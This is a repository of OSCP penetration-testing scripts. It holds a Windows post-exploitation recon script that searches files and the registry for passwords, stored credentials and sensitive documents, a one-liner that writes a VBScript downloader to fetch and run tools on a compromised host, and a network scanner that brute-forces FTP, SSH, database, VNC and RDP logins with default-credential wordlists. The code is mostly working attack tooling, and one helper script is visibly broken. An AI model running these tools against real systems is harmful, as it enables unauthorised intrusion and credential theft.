├── LICENSE ├── README.md ├── localrecon.cmd ├── oscp_process.py ├── quickscan ├── TODOs.txt ├── checkcreds.sh ├── quickscan.sh └── wordlists │ ├── ftp_pairs.txt │ ├── ftp_users.txt │ ├── http_passwords.txt │ ├── http_users.txt │ ├── mssql_passwords.txt │ ├── mssql_users.txt │ ├── mysql_passwords.txt │ ├── mysql_users.txt │ ├── passwords.txt │ ├── users.txt │ └── webdav_pairs.txt └── wget.cmd /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2018, Arris Huijgen 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Random code snippets 2 | 3 | | Snippet | Description | 4 | | ---------------- | ---------------------------------------------------------------------------------------- | 5 | | localrecon.cmd | Script created for OSCP for reconnaissance to obtain a quick insight in the hacked box. | 6 | | wget.cmd | Script created for OSCP to download files to a Windows host via the commandline. | 7 | | quickscan | Script to identify alive hosts in a network, which then for each host executes various tools to identify any vulnerabilities on its open ports. | 8 | | oscp\_process.py | Pseudocode for attacking the OSCP lab network | 9 | 10 | -------------------------------------------------------------------------------- /localrecon.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | REM 3 | REM This software is provided under under the BSD 3-Clause License. 4 | REM See the accompanying LICENSE file for more information. 5 | REM 6 | REM Utility to generate a summary of a Windows system 7 | REM 8 | REM Author: 9 | REM Arris Huijgen (@bitsadmin) 10 | REM 11 | REM Website: 12 | REM https://github.com/bitsadmin/ 13 | REM 14 | REM TODO: 15 | REM * Check drives other than C:\ (if available) 16 | REM * Add commandline parameter to perform a brief check or more extended 17 | REM * Make sure that the output of this script is not again included in the output 18 | REM 19 | REM Some more (untested) commands: 20 | REM pushd C:\ ^&^& findstr /I /N /S /P /R flag password secret confidential account payroll credit record * ^&^& popd 21 | REM "dir C:\ /S /O-D /TW ^| findstr /C:"Directory of" /C:"%d%""!;! 22 | REM "dir C:\ /a-r-d /s /b 23 | REM To add: for /F "tokens=2* delims= " %%i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j 24 | REM 25 | 26 | setlocal enabledelayedexpansion 27 | set o="%tmp%\recon%random%.out" 28 | set d=-12-2016 29 | REM Define a separator character (!;!) 30 | (set ;=^ 31 | %=Do not remove this line=% 32 | ) 33 | set t[0][name]=Basic 1 34 | set t[0]=COMPUTERNAME!;!USERDNSDOMAIN!;!USERNAME!;!HOMEDRIVE!;!HOMEPATH 35 | set t[1][name]=Basic 2 36 | set t[1]=systeminfo!;!wmic logicaldisk get caption,description,drivetype,providername,volumename ^| more 37 | set t[2][name]=Users 38 | set t[2]=query session!;!net user!;!net localgroup Administrators!;!net user Administrator!;!tree /F "C:\Users"!;!dir /s /b /A:H "C:\Users\"^|find /V "desktop.ini"!;!tree /F "C:\Documents and Settings"!;!dir /s /b /A:H "C:\Documents and Settings\"^|find /V "desktop.ini" 39 | set t[3][name]=Network 40 | set t[3]=ipconfig /all!;!route print!;!arp -a!;!netstat -ano!;!net session ^| find "\\"!;!net view!;!netsh advfirewall show allprofiles!;!netsh firewall show state!;!netsh firewall show config!;!nltest /dclist: 41 | set t[4][name]=Processes, services and tasks 42 | set t[4]=wmic PROCESS get Processid,Caption,Commandline ^| more!;!query process *!;!tasklist /SVC!;!net start!;!DRIVERQUERY /V!;!schtasks /query /fo LIST /v!;!at!;!dir /B C:\WINDOWS\Tasks!;!set ^| find /V "t[" 43 | set t[5][name]=Patch-level 44 | set t[5]=wmic qfe get Caption,Description,HotFixID,InstalledOn ^| more 45 | set t[6][name]=Base image configuration files 46 | set t[6]=dir /s /b C:\sysprep.inf C:\sysprep.xml C:\unattend.txt C:\Unattended.xml C:\Services.xml C:\ScheduledTasks.xml C:\Printers.xml C:\Drives.xml C:\DataSources.xml 47 | set t[7][name]=Configuration 48 | set t[7]=reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated!;!reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated!;!reg query HKLM\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits!;!reg query HKLM\System\CurrentControlSet\Services\NfsServer\Parameters\SafeSetUidGidBits!;!gpresult /z 49 | set t[8][name]=Credentials 50 | set t[8]=cmdkey /list!;!dir /s /b /a:-D C:\*pass* C:\*cred* C:\*vnc* C:\*.config* C:\*.kdb*!;!findstr /si password *.xml *.ini *.txt *.ps1 *.cmd!;!reg query HKLM /f password /t REG_SZ /s!;!reg query HKCU /f password /t REG_SZ /s!;!reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V Default* 51 | set t[9][name]=Remote Desktop applications and VPN 52 | set t[9]=dir /b /s C:\*vnc.ini!;!reg query HKCU\SOFTWARE\ORL\WinVNC3\Password!;!dir /s /b C:\*.rdp C:\*.pbk!;!reg query HKCU\Software\SimonTatham\PuTTY\Sessions!;!reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s 53 | set t[9][name]=Configuration 2 54 | set t[9]=wmic service get name,displayname,pathname,startmode^|findstr /i "Auto"^|findstr /i /v "C:\Windows\\"^|findstr /i /v """" 55 | set t[10][name]=Files 56 | set t[10]=dir /S /A /B C:\network-secret.txt C:\proof.txt C:\local.txt C:\*.vsd* C:\*flag* C:\*password* C:\*bank* C:\*competit* C:\*finance* C:\*invoice* C:\*risk* C:\*key* C:\*.pcf C:\*.crt C:\*.key C:\*.log ^| find /V /I "%SystemRoot%\winsxs\" ^| find /I /V "%SystemRoot%\Microsoft.NET\" 57 | set t[11][name]=E-mail and documents 58 | set t[11]=dir /S /A /B *.dbx *.wab *.doc *.docx *.xlsx 59 | set t[12][name]=Pre-installed languages 60 | set t[12]=where python!;!where perl!;!where ruby!;!dir /s /b C:\python.exe C:\pythonw.exe C:\perl.exe C:\ruby.exe C:\rubyw.exe C:\bash.exe C:\java.exe C:\javaw.exe C:\php.exe C:\powershell.exe 61 | set last=12 62 | 63 | :: CMD variables 64 | echo --------------- [0/%last%] %t[0][name]% --------------- >%o% 2>&1 65 | echo --------------- [0/%last%] %t[0][name]% --------------- 66 | FOR /F %%i IN ("!t[0]!") DO ( 67 | echo =^> %%~i 68 | echo %%i: !%%i! >>%o% 2>&1 69 | ) 70 | 71 | :: Commands 72 | FOR /L %%n IN (1,1,%last%) DO ( 73 | echo. >>%o% 2>&1 74 | echo. >>%o% 2>&1 75 | echo --------------- [%%n/%last%] !t[%%n][name]! --------------- >>%o% 2>&1 76 | echo. 77 | echo --------------- [%%n/%last%] !t[%%n][name]! --------------- 78 | FOR /F "delims=;" %%i IN ("!t[%%n]!") DO ( 79 | set c=%%~i 80 | echo =^> !c! >>%o% 2>&1 81 | echo =^> !c! 82 | REM If command does not contain a pipe, execute directly 83 | REM Otherwise execute using cmd /c 84 | IF !c!==!c:^|=! ( 85 | !c! >>%o% 2>&1 86 | ) ELSE ( 87 | cmd /C "!c! >>%o% 2>&1" 88 | ) 89 | echo. >>%o% 2>&1 90 | echo. >>%o% 2>&1 91 | ) 92 | ) 93 | 94 | REM Results 95 | echo. 96 | echo Done. Results in %o%. 97 | -------------------------------------------------------------------------------- /oscp_process.py: -------------------------------------------------------------------------------- 1 | # Title: Pseudocode for attacking the OSCP lab network 2 | # Author: Arris Huijgen (@bitsadmin) 3 | # Website: https://github.com/bitsadmin/ 4 | 5 | # GENERAL NOTES 6 | # - The OSCP lab was built pre-EternalBlue, therefore many machines are vulnerable to this exploit but you won't learn anything if you exploit machines this way. 7 | # - Make notes! What I used was a Notebook in OneNote with a section for each network segment, and a dedicated page for every host. 8 | # - I used a page template which contains sections for: 9 | # - IP(s) and hostname 10 | # - Raw notes 11 | # - Open ports (TCP/UDP) 12 | # - Network interfaces 13 | # - Credentials 14 | # - Filesystem (proof.txt/network-secret.txt) 15 | # - Filling in this template forces you to properly perform reconnaissance on every host 16 | # - Use this same structure on your filesystem for files collected from these hosts 17 | # - Have some very old Linux VM (I used CentOS 4.8) to compile exploit sourcecode. Have an SSH server running on this machine and download the binaries to Kali via SFTP. 18 | # - Spend a lot of time in the labs and #TRYHARDER or temporarily move on to another machine whenever you are stuck 19 | 20 | # TIPS & TRICKS 21 | # - Use the instructions in wget.cmd to download files from the Windows command prompt 22 | # - On Linux after obtaining a (reverse) TCP shell it is often useful to turn it into a TTY shell to for example remain interactive with commands like 'sudo -s' 23 | # - Paste into the TCP shell: python -c 'import pty; pty.spawn("/bin/sh")' 24 | # - Whenever an automated (Metasploit/script) exploit fails, inspect the traffic using WireShark to identify any issues 25 | # - ... 26 | 27 | # PREPARATION 28 | # - Configure your Kali for example using the configure.sh script from https://github.com/bitsadmin/linuxconfig 29 | # - Add additional console aliases for increased productivity, for example the scripts from https://github.com/bitsadmin/linuxconfig -> console 30 | # - Familiarize yourself with the -D, -L and -R parameters of Linux' ssh client for pivoting 31 | # - ... 32 | 33 | 34 | def main(): 35 | # Obtain a quick insight into the network using quickscan 36 | execute_script('https://github.com/bitsadmin/miscellaneous', 'quickscan') 37 | 38 | for machine in lab: 39 | # Perform full nmap UDP scan 40 | tcp_ports = perform_nmap(tcp) 41 | 42 | for port in tcp_ports: 43 | # Perform reconnaissance to obtain: 44 | # - Software running on the port 45 | # - Version information of software 46 | 47 | exploited = attempt_exploit(machine, port) 48 | 49 | if not exploited: 50 | # Perform full nmap UDP scan 51 | udp_ports = perform_nmap(udp) 52 | 53 | 54 | def attempt_exploit(machine, port): 55 | # 1. Search exploit using Kali's searchsploit tool 56 | # 2. Update payload to for example a reverse Meterpreter shell to your IP 57 | # 3. Attempt exploit 58 | # 4. If not working, but should work, revert the VM and try again 59 | 60 | shell = exploit(machine, port) 61 | 62 | if shell: 63 | local_recon() 64 | 65 | # From shell with limited privileges, escalate to a high-privileged user 66 | escalate() 67 | 68 | # Collect your proof.txt file and dump any other credential material you can now access 69 | # Add this information to your notes as you might need it later 70 | collect() 71 | 72 | 73 | def local_recon(): 74 | if windows: 75 | # Download localrecon.cmd in limited Windows shell 76 | # See https://github.com/bitsadmin/miscellaneous -> wget.cmd 77 | results = execute_script('https://github.com/bitsadmin/miscellaneous', 'localrecon.cmd') 78 | # Evaluate results looking for any: 79 | # - Passwords 80 | # - Non-default software installed -> Identify software version and check if exploitable 81 | # - Missing patches using https://github.com/bitsadmin/wesng 82 | 83 | elif linux: 84 | results = execute_script('https://github.com/mzet-/linux-exploit-suggester', 'linux-exploit-suggester.sh') 85 | # Evaluate results looking for any: 86 | # - Credential material 87 | # - Exploits for vulnerable software 88 | # - Weak file system permissions 89 | 90 | 91 | if __name__ == '__main__': 92 | main() 93 | -------------------------------------------------------------------------------- /quickscan/TODOs.txt: -------------------------------------------------------------------------------- 1 | # TODO 2 | # Implement: 3 | # - 554/open/tcp//rtsp?/// 4 | # Maybe implement: 5 | # - 995/open/tcp//ssl|pop3//UW Imap pop3d 2001.78rh/ 6 | # - 135/open/tcp//msrpc//Microsoft Windows RPC/ 7 | # - 5900/open/tcp//vnc//VNC (protocol 3.8)/ 8 | # - 3372/open/tcp//msdtc//Microsoft Distributed Transaction Coordinator/ 9 | # - 53/open/tcp//domain//Microsoft DNS 6.1.7601/ 10 | # - 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos (server time: 2013-12-29 13:52:51Z)/ 11 | # - 389/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: thinc.local, Site: Default-First-Site-Name)/ 12 | # - 3268/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: thinc.local, Site: Default-First-Site-Name)/ 13 | # - 888/open/tcp//http-proxy//Squid http proxy 3.3.8/ 14 | # - Server responded that host is not allowed to connect to MySQL service. 15 | # Something goes wrong with: 16 | # - /open/tcp//status//1 (RPC #100024)/ 17 | # - l-s//Microsoft SQL Server 2000 8.00.766.00; SP3a/ 18 | # - 080/open/tcp//http//Apache httpd 2.4.9 ((Win32) PHP|5.5.12)/ 19 | # Skip: 20 | # - 800/open/tcp//vnc-http//TightVNC (user: gamma; VNC TCP port: 5900)/ 21 | 22 | Oracle-TNS 23 | # TODO, check: http://tools.kali.org/vulnerability-analysis/dbpwaudit -------------------------------------------------------------------------------- /quickscan/checkcreds.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ips=10.11.1.0/24 3 | username=$1 4 | password=$2 5 | 6 | nmap -sT -T4 -p445 $ips -oA creds 7 | ips=$(grep 'Status: Up' creds.gnmap|cut -d' ' -f2) 8 | 9 | for ip in $ips 10 | do 11 | openports=$(sed -n -e 's/.*Ports: //;s_\([0-9]\{1,5\}/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/\),\?\s_\1\n_;t matched;d;:matched;P;D' $(get-outfile $ip nmap_tcp gnmap)|grep /open/) 12 | 13 | while read -r port 14 | do 15 | # NetBIOS 16 | elif [[ $portname == "netbios-ssn" ]] 17 | then 18 | smbclient -L //10.11.1.220/ -U $username%$password 19 | if [[ $? == 0 ]] 20 | then 21 | echo [+] Found credentials to work on SMB of host 10.11.1.220 22 | fi 23 | fi 24 | done <<< "$openports" 25 | done 26 | -------------------------------------------------------------------------------- /quickscan/quickscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # This software is provided under under the BSD 3-Clause License. 4 | # See the accompanying LICENSE file for more information. 5 | # 6 | # Script to obtain a quick insight into an unknown network 7 | # storing the results in a structured way. 8 | # 9 | # Author: 10 | # Arris Huijgen (@bitsadmin) 11 | # 12 | # Website: 13 | # https://github.com/bitsadmin/ 14 | # 15 | 16 | # Instructions 17 | # 1. Place the wordlists in the /root/hosts/_credentials folder: 18 | # - Generic list of users in users.txt (i.e. admin, administrator, user) 19 | # - Generic list of passwords in passwords.txt (i.e. admin, password, 1234) 20 | # - Service-specific list of users in users_[service].txt (i.e. for MySQL stored in users_mysql.txt: root, mysql) 21 | # - Service-specific list of passwords in passwords_[service].txt 22 | # 2. Define the scope to be scanned below 23 | # 3. Execute the script and wait for the results to appear in the /root/hosts/* folder structure 24 | 25 | # Scope 26 | cat > hosts.txt << END 27 | 10.11.1.0/24 28 | 10.11.2.5 29 | END 30 | 31 | # Extract last octet from IP address 32 | function get-lastoctet { 33 | printf "%03d" $(echo "$1"|cut -d'.' -f 4) 34 | } 35 | 36 | # Compile output filename 37 | function get-outfile { 38 | local ext=.txt 39 | if [ ! -z $3 ] 40 | then 41 | if [ $3 = "null" ] 42 | then 43 | ext= 44 | else 45 | ext=.$3 46 | fi 47 | fi 48 | printf "./%s/%s%s" $(get-lastoctet $1) $2 $ext 49 | } 50 | 51 | # Fetch path to tool-specific wordlist 52 | function get-wordlist { 53 | local wltype=$1 54 | local tool=$2 55 | basedir="/root/hosts/_credentials" 56 | basefile="${basedir}/${wltype}.txt" 57 | toolfile="${basedir}/${tool}_${wltype}.txt" 58 | if [ -f "$toolfile" ] 59 | then 60 | outfile="/tmp/${tool}_${wltype}_$RANDOM.txt" 61 | cat $toolfile $basefile|sort -u>$outfile 62 | echo $outfile 63 | return 64 | fi 65 | echo $basefile 66 | } 67 | 68 | # ARP scan for quick insight 69 | #start=$SECONDS 70 | #arp-scan -I tap0 $iprange > arp-scan.txt 71 | #echo "ARP scan took: $(($SECONDS-$start)) seconds" 72 | 73 | # Perform Nmap Initial scan 74 | start=$SECONDS 75 | echo "Running initial Nmap scan" 76 | nmap -F -n -T4 -iL hosts.txt -oA quick 77 | echo "NMap Initial scan took: $(($SECONDS-$start)) seconds" 78 | ips=$(grep 'Status: Up' quick.gnmap|cut -d' ' -f2) 79 | 80 | # Create folders for output 81 | for ip in $ips 82 | do 83 | mkdir $(get-lastoctet $ip) 84 | done 85 | 86 | # Make screenshots of all found supported protocols found 87 | eyewitness -x $(pwd)/quick.xml --threads 5 --timeout 3 --all-protocols -d $(pwd)/eyewitness 88 | 89 | # Run various tools against found TCP ports 90 | for ip in $ips 91 | do 92 | start=$SECONDS 93 | echo "Running Nmap TCP scan against ${ip}" 94 | timeout --signal=INT 900 nmap -T4 -sV -sC -p- $ip -oA $(get-outfile $ip nmap_tcp null) 95 | rc=$? 96 | if [[ $rc != 0 ]] 97 | then 98 | echo $ip >> timedout_tcp 99 | continue 100 | fi 101 | echo "NMap TCP scan took: $(($SECONDS-$start)) seconds" 102 | 103 | # HOST TIMER 104 | hstart=$SECONDS 105 | 106 | openports=$(sed -n -e 's/.*Ports: //;s_\([0-9]\{1,5\}/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/\),\?\s_\1\n_;t matched;d;:matched;P;D' $(get-outfile $ip nmap_tcp gnmap)|grep /open/) 107 | while read -r port 108 | do 109 | # PORT TIMER 110 | pstart=$SECONDS 111 | portname="$(echo "$port"|cut -d"/" -f5)" 112 | portid="$(echo "$port"|cut -d"/" -f1)" 113 | 114 | # Skip tcpwrapped ports and hosts without any open TCP ports 115 | if [[ $portname == "tcpwrapped" || $portname == "" ]] 116 | then 117 | continue 118 | fi 119 | 120 | echo "Checking ${portid}/TCP (${portname})" 121 | 122 | # HTTP (80) 123 | if [[ $portname == "http" || $portname == "http?" ]] 124 | then 125 | nikto -nossl -host $ip -port $portid -output $(get-outfile $ip nikto_${portid}_http) 126 | wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 http://$ip:$portid/FUZZ > $(get-outfile $ip wfuzz_${portid}_http) 127 | eyewitness --web -d $(get-outfile $ip eye-http null) --no-prompt --add-http-ports $portid --single $ip:$portid 128 | 129 | # HTTPS (443) 130 | elif [[ $portname == "https" || $portname == "https?" || $portname == "ssl|http" ]] 131 | then 132 | nikto -ssl -host $ip -port $portid -output $(get-outfile $ip nikto_${portid}_https) 133 | wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 https://$ip:$portid/FUZZ > $(get-outfile $ip wfuzz_${portid}_https) 134 | eyewitness --web -d $(get-outfile $ip eye-https null) --no-prompt --add-https-ports $portid --single $ip:$portid 135 | 136 | # FTP (21) 137 | elif [[ $portname == "ftp" || $portname == "ftp?" ]] 138 | then 139 | medusa -h $ip -U $(get-wordlist users ftp) -P $(get-wordlist passwords ftp) -O $(get-outfile $ip medusa-ftp) -e ns -M ftp -n $portid -t 10 140 | 141 | # SSH (22) 142 | elif [[ $portname == "ssh" ]] 143 | then 144 | medusa -h $ip -U $(get-wordlist users ssh) -P $(get-wordlist passwords ssh) -O $(get-outfile $ip medusa-ssh) -e ns -M ssh -n $portid -t 10 145 | 146 | # MSSQL (1433) 147 | elif [[ $portname == "ms-sql" || $portname == "ms-sql-s" ]] 148 | then 149 | medusa -h $ip -U $(get-wordlist users mssql) -P $(get-wordlist passwords mssql) -O $(get-outfile $ip medusa-mssql) -e ns -M mssql -n $portid -t 10 150 | 151 | # MySQL (3306) 152 | elif [[ $portname == "mysql" || $portname == "mysql?" ]] 153 | then 154 | nmap -sT -p3306 --script mysql-brute $ip -oA $(get-outfile $ip nmap_mysql null) 155 | medusa -h $ip -U $(get-wordlist users mysql) -P $(get-wordlist passwords mysql) -O $(get-outfile $ip medusa-mysql) -e ns -M mysql -n $portid -t 10 156 | 157 | # NetBIOS (139) 158 | elif [[ $portname == "netbios-ssn" ]] 159 | then 160 | enum4linux -a $ip >$(get-outfile $ip enum4linux) 161 | timeout --signal=INT 900 nmap -T4 -sU -sT -p U:137,T:139 --script "vuln" $ip -oN $(get-outfile $ip nmap_netbios nmap) 162 | 163 | # Microsoft-ds (445) 164 | elif [[ $portname == "microsoft-ds" ]] 165 | then 166 | enum4linux -a $ip >$(get-outfile $ip enum4linux) 167 | timeout --signal=INT 900 nmap -T4 -sT -p139,445 --script "smb-vuln-*" $ip -oN $(get-outfile $ip nmap_smbvuln nmap) 168 | 169 | # Telnet (23) 170 | elif [[ $portname == "telnet" || $portname == "telnet?" ]] 171 | then 172 | medusa -h $ip -U $(get-wordlist users telnet) -P $(get-wordlist passwords telnet) -O $(get-outfile $ip medusa-telnet) -e ns -M telnet -n $portid -t 10 173 | 174 | # Oracle TNS listener 175 | elif [[ $portname == "oracle-tns" ]] 176 | then 177 | oscanner -s $ip -P $portid > $(get-outfile $ip oracle-tns) 178 | 179 | # VNC (5900) 180 | elif [[ $portname == "vnc" ]] 181 | then 182 | #eyewitness --vnc -d $(get-outfile $ip eye-vnc null) --no-prompt --single $ip 183 | medusa -h $ip -U $(get-wordlist users vnc) -P $(get-wordlist passwords vnc) -O $(get-outfile $ip medusa-rdp) -e ns -M vnc -n $portid -t 10 184 | 185 | # SMTP (25) 186 | elif [[ $portname == "smtp" ]] 187 | then 188 | smtp-user-enum -U $(get-wordlist users) -t $ip -p $portid > $(get-outfile $ip smtp-users) 189 | smtp-user-enum -U $(get-wordlist users_extensive) -t $ip -p $portid > $(get-outfile $ip smtp-users_extensive) 190 | smtp-user-enum -U $(get-wordlist names) -t $ip -p $portid > $(get-outfile $ip smtp-names) 191 | 192 | # RDP (3389) 193 | elif [[ $portname == "ms-wbt-server" ]] 194 | then 195 | medusa -h $ip -U $(get-wordlist users rdp) -P $(get-wordlist passwords rdp) -O $(get-outfile $ip medusa-rdp) -e ns -M rdp -n $portid -t 10 196 | 197 | # RPCBIND (111) 198 | elif [[ $portname == "rpcbind" ]] 199 | then 200 | rpcinfo -p $ip > $(get-outfile $ip rpcinfo) 2>&1 201 | showmount -e $ip $(get-outfile $ip showmount) 2>&1 202 | fi 203 | 204 | # TIMER 205 | echo "Port took: $(($SECONDS-$pstart)) seconds" 206 | done <<< "$openports" 207 | 208 | # TIMER 209 | echo "Host took: $(($SECONDS-$hstart)) seconds" 210 | done 211 | 212 | # More advanced checks 213 | for ip in $ips 214 | do 215 | openports=$(sed -n -e 's/.*Ports: //;s_\([0-9]\{1,5\}/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/\),\?\s_\1\n_;t matched;d;:matched;P;D' $(get-outfile $ip nmap_tcp gnmap)|grep /open/) 216 | 217 | while read -r port 218 | do 219 | # PORT TIMER 220 | pstart=$SECONDS 221 | portname="$(echo "$port"|cut -d"/" -f5)" 222 | portid="$(echo "$port"|cut -d"/" -f1)" 223 | 224 | # HTTP 225 | if [[ $portname == "http" || $portname == "http?" ]] 226 | then 227 | wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 http://$ip:$portid/FUZZ.html > $(get-outfile $ip wfuzz_${portid}_http-html) 228 | eyewitness --web -d $(get-outfile $ip eye-http null) --no-prompt --add-http-ports $portid --single $ip:$portid 229 | 230 | # HTTPS 231 | elif [[ $portname == "https" || $portname == "https?" || $portname == "ssl|http" ]] 232 | then 233 | wfuzz -c -z file,wordlist/general/big.txt --hc 404 -R 0 https://$ip:$portid/FUZZ.html > $(get-outfile $ip wfuzz_${portid}_https-html) 234 | eyewitness --web -d $(get-outfile $ip eye-https null) --no-prompt --add-https-ports $portid --single $ip:$portid 235 | fi 236 | done <<< "$openports" 237 | done 238 | 239 | # Perform Nmap top 1000 UDP scan 240 | start=$SECONDS 241 | for ip in $ips 242 | do 243 | echo "Running Nmap UDP scan against ${ip}" 244 | timeout --signal=INT 900 nmap -T4 -sU -sV -sC --top-ports 1000 $ip -oA $(get-outfile $ip nmap_udp null) 245 | rc=$? 246 | if [[ $rc != 0 ]] 247 | then 248 | echo $ip >> timedout_udp 249 | continue 250 | fi 251 | 252 | # Run various tools against found UDP ports 253 | openports=$(sed -n -e 's/.*Ports: //;s_\([0-9]\{1,5\}/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/[^/]*/\),\?\s_\1\n_;t matched;d;:matched;P;D' $(get-outfile $ip nmap_udp gnmap)|grep /open) 254 | 255 | # SNMP (161) 256 | if [[ $portname == "snmp" || $portname == "snmp?" ]] 257 | then 258 | snmp-check -v 2c $ip>$(get-outfile $ip snmpcheck) 259 | 260 | # DNS (53) 261 | elif [[ $portname == "domain" ]] 262 | then 263 | snmp-check -v 2c $ip>$(get-outfile $ip snmpcheck) 264 | 265 | # Netbios-ns (137) 266 | elif [[ $portname == "netbios-ns" ]] 267 | then 268 | nbtscan -v $ip >$(get-outfile $ip nbtscan txt) 269 | fi 270 | done 271 | echo "NMap UDP scan took: $(($SECONDS-$start)) seconds" -------------------------------------------------------------------------------- /quickscan/wordlists/ftp_pairs.txt: -------------------------------------------------------------------------------- 1 | newuser wampp 2 | anonymous some@mail.net 3 | -------------------------------------------------------------------------------- /quickscan/wordlists/ftp_users.txt: -------------------------------------------------------------------------------- 1 | anonymous 2 | root 3 | user 4 | ftpuser 5 | newuser 6 | -------------------------------------------------------------------------------- /quickscan/wordlists/http_passwords.txt: -------------------------------------------------------------------------------- 1 | xampp -------------------------------------------------------------------------------- /quickscan/wordlists/http_users.txt: -------------------------------------------------------------------------------- 1 | wampp -------------------------------------------------------------------------------- /quickscan/wordlists/mssql_passwords.txt: -------------------------------------------------------------------------------- 1 | password 2 | 3 | -------------------------------------------------------------------------------- /quickscan/wordlists/mssql_users.txt: -------------------------------------------------------------------------------- 1 | sa 2 | admin 3 | administrator 4 | -------------------------------------------------------------------------------- /quickscan/wordlists/mysql_passwords.txt: -------------------------------------------------------------------------------- 1 | password 2 | usbw 3 | -------------------------------------------------------------------------------- /quickscan/wordlists/mysql_users.txt: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | -------------------------------------------------------------------------------- /quickscan/wordlists/passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | 1234 4 | 5 | -------------------------------------------------------------------------------- /quickscan/wordlists/users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | administrator 3 | Administrator 4 | -------------------------------------------------------------------------------- /quickscan/wordlists/webdav_pairs.txt: -------------------------------------------------------------------------------- 1 | wampp xampp -------------------------------------------------------------------------------- /wget.cmd: -------------------------------------------------------------------------------- 1 | :: This software is provided under under the BSD 3-Clause License. 2 | :: See the accompanying LICENSE file for more information. 3 | :: 4 | :: Oneliner to download files on Windows via the commandline 5 | :: Use this after somehow obtaining a shell on a Windows machine 6 | :: 7 | :: Author: 8 | :: Arris Huijgen (@bitsadmin) 9 | :: 10 | :: Website: 11 | :: https://github.com/bitsadmin/ 12 | :: 13 | 14 | :: Instructions 15 | :: 1. Execute oneliner below to create the wget.vbs script 16 | :: 2. Download any file using the following commandline: cscript wget.vbs http://1.2.3.4/localrecon.cmd localrecon.cmd 17 | :: 3. Execute the downloaded file, i.e.: localrecon.cmd 18 | 19 | echo On Error Resume Next >wget.vbs & echo strUrl = WScript.Arguments.Item(0) >>wget.vbs & echo StrFile = WScript.Arguments.Item(1) >>wget.vbs & echo Dim http, stream >>wget.vbs & echo Set http = Nothing >>wget.vbs & echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>wget.vbs & echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>wget.vbs & echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>wget.vbs & echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>wget.vbs & echo http.Open ^"GET^", strUrl, False >>wget.vbs & echo http.Send >>wget.vbs & echo Set stream = createobject("Adodb.Stream") >>wget.vbs & echo With stream >>wget.vbs & echo .Type = 1 >>wget.vbs & echo .Open >>wget.vbs & echo .Write http.ResponseBody >>wget.vbs & echo .SaveToFile StrFile, 2 >>wget.vbs & echo End With >>wget.vbs 20 | --------------------------------------------------------------------------------